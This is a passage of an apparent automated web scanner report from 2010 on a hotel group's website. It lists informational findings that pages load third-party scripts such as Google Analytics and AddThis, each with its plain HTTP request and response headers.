<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.25. http://www.redcarnationhotels.com/company-information/disclaimer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/disclaimer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/disclaimer HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:51 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=abe29acb6d5854615f44223bd3203ec3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Disclaimer and T&Cs - Red Carna
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.26. http://www.redcarnationhotels.com/company-information/privacy-policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/privacy-policy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/privacy-policy HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:00 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0043ff72577cd51e6272e4571531dea3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Privacy Policy - Red Carnation
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.27. http://www.redcarnationhotels.com/company-information/telephone-bookings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/telephone-bookings

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /company-information/telephone-bookings HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:22 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2d9594e1a0d09c150978b0da38cd1d55; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Telephone Bookings</title>
<met
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.28. http://www.redcarnationhotels.com/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /contact-us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmb=187643563; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:41 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0d22fa26fc7a3888a78729de3b2aa4c5; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 40448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Contact Us - London, Florida, G
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.29. http://www.redcarnationhotels.com/dining  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:32:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:32:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=c8fcf4d5047b7e929197ec16491a2999; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.30. http://www.redcarnationhotels.com/dining/bar-lounge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/bar-lounge

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining/bar-lounge HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:49:05 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:49:05 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bar and Lounge - Red Carnation
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.31. http://www.redcarnationhotels.com/dining/food-wine  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining/food-wine HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Food and Wine - Boutique Hotels
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.32. http://www.redcarnationhotels.com/dining/food-wine/wine-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/food-wine/wine-events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining/food-wine/wine-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:53:27 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:53:27 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Wine Events - Red Carnation Hot
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.33. http://www.redcarnationhotels.com/dining/seasonal-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/seasonal-events

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining/seasonal-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:50:24 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:50:24 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Seasonal Events - Red Carnation
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.34. http://www.redcarnationhotels.com/dining/traditional-treats  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /dining/traditional-treats

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dining/traditional-treats HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/dining
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:49:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:49:17 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Traditional Treats - Red Carnat
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.35. http://www.redcarnationhotels.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:20 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=3691b65d033f07333a5b8076728dd0ba; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>FAQ - Red Carnation Hotels</tit
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.36. http://www.redcarnationhotels.com/gay_friendly_hotels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /gay_friendly_hotels

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gay_friendly_hotels HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:31 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:31 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Gay Hotels, Gay Friendly
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.37. http://www.redcarnationhotels.com/gay_london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /gay_london

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gay_london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gay Friendly Hotels in London -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.38. http://www.redcarnationhotels.com/get-more-from-your-stay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /get-more-from-your-stay

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /get-more-from-your-stay HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/your-stay
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:48:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:48:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Boutique Hotels London -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.39. http://www.redcarnationhotels.com/grand-designs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /grand-designs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /grand-designs HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:59:12 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:59:12 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Grand Designs London Live</titl
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.40. http://www.redcarnationhotels.com/haughton-exhibitors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /haughton-exhibitors

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /haughton-exhibitors HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:53 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Haughton Art Antiques London -
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.41. http://www.redcarnationhotels.com/haughtons-art-antiques-fair  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /haughtons-art-antiques-fair

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /haughtons-art-antiques-fair HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:01:50 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:01:50 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33273

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Haughtons Art Antiques Fair - E
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
<img src="/static/images/logo-red-carnation-hp.gif" alt="Logo Red Carantion" class="notforscreen logo"/>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
5.42. http://www.redcarnationhotels.com/kate-starkey-couture  previous  next

Summary

Severity:   Information
